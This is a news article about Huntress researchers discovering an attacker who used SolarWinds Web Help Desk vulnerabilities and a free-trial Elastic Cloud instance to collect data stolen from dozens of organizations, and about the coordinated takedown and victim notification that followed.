Huntress Uncovers Threat Actor Using Elastic Cloud Free Trial to Hoard Stolen Data

A threat actor exploited vulnerabilities in widely used enterprise software and then routed stolen data into a free-trial instance of Elastic Cloud's security platform, using tools designed to defend organizations as the infrastructure for their own attacks. Security researchers at Huntress uncovered the campaign and say it marks the first time they have observed an adversary leverage Elastic Cloud for data exfiltration.

The attacker created the Elastic Cloud deployment on January 28, 2026, and used it for several days before the instance was taken offline following coordination between Huntress, Elastic, and law enforcement. During that window, telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.

The technique was notable for its simplicity and audacity. Rather than building custom infrastructure, the attacker ran an encoded PowerShell command containing a hardcoded API key and credentials to push stolen data directly into the free cloud instance. Once there, the data was organized within a "systeminfo index" that, as Huntress researchers discovered, contained details across not just one victim but an entire campaign. Infosecurity Magazine's Alessandro Mascellino reported the deployment was used to collect and analyze data from compromised systems across dozens of organizations.

Huntress had been tracking the campaign as part of a broader investigation into SolarWinds Web Help Desk vulnerabilities. The firm published this report as "Part 2" of that investigation, deliberately staging the disclosure to allow time for victim notification and multi-agency coordination. Researchers also noted a possible connection to opportunistic attacks against Microsoft SharePoint and other enterprise software, though that linkage was not fully confirmed.

The attacker's operational profile points to deliberate, if imperfect, efforts to obscure identity. Artifacts recovered from the investigation included accounts registered through the disposable email service quieresmail.com and firstmail.ltd, a Russian-registered temporary email network. The actor also routed activity through a SAFING_VPN tunnel. No specific threat group or nation-state attribution was made by Huntress.

What made the campaign particularly striking to the researchers was the inversion of purpose: a SIEM platform, whose entire function is to help security teams monitor, triage, and prioritize threats, was turned against the very organizations it is meant to protect. "While we have previously seen threat actors leveraging Velociraptor and other DFIR-focused tools for command and control, this was the first time we observed an adversary use Elastic Cloud for exfiltration," Huntress stated. "The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions. They could then triage their victims and compromised endpoints, literally using SIEM technology."

The cloud instance has since been taken offline. "We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," Huntress said.

The campaign raises immediate questions about whether free-trial provisioning for powerful cloud security tools requires stronger identity verification or behavioral monitoring to detect abuse before stolen data can be organized and acted upon at scale.